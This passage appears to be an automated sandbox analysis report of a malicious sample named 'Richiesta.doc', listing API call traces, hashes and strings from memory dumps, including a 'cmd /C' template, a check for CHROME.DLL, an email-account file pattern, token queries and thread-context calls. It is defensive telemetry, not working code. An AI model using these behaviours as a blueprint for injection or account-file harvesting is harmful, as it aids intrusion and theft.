  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: AD22F7E25E6FCCF900B5060D4C5E9532
Total matches: 172
Initial sample Analysis ID: 68439
Initial sample SHA 256: 78E57715D0C6C12E90E96D82B3FF839B78C421F5EFF663AAB6D19DA5B6D82200
Initial sample name: Richiesta.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
